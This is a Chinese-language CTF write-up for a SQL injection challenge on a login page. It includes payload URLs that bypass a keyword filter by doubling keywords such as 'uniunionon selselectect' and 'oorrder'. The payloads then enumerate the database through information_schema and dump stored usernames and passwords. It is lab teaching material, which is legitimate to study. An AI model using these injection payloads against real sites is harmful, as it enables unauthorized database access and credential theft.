信息搜集
进入界面:
输入用户名为admin,密码随便输一个:
发现是GET传参,有username和password两个传参点。
我们测试一下password点位能不能注入:
单引号闭合报错,根据报错信息,我们可以判断是单引号闭合。
SQL注入
先order by测试一下字段数:
check.php?username=admin&password=1' order by 3--+
报错。看报错信息,吞掉了order的or 和by,即过滤了or和by。
使用双写绕过:
check.php?username=admin&password=1' oorrder bbyy 3--+
测试出字段数为3.
顺便用万能密码试试能不能登录:
接下来按联合注入的流程走:
union 和 select 被过滤。双写绕过:
check.php?username=admin&password=1' uniunionon selselectect 1,2,3--+
找到相应回显位,这里我们利用回显位3:
check.php?username=admin&password=1' uniunionon selselectect 1,2,database()--+ 数据库名为geekcheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema='geek')--+ 数据表b4bsql,geekusercheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_name='b4bsql')--+ 列名id,username,password(selselectect group_concat(username,":",passwoorrd) frfromom b4bsql)--+
得到flag.
总结
考察的是联合注入,但是增加了过滤。
使用双写绕过。
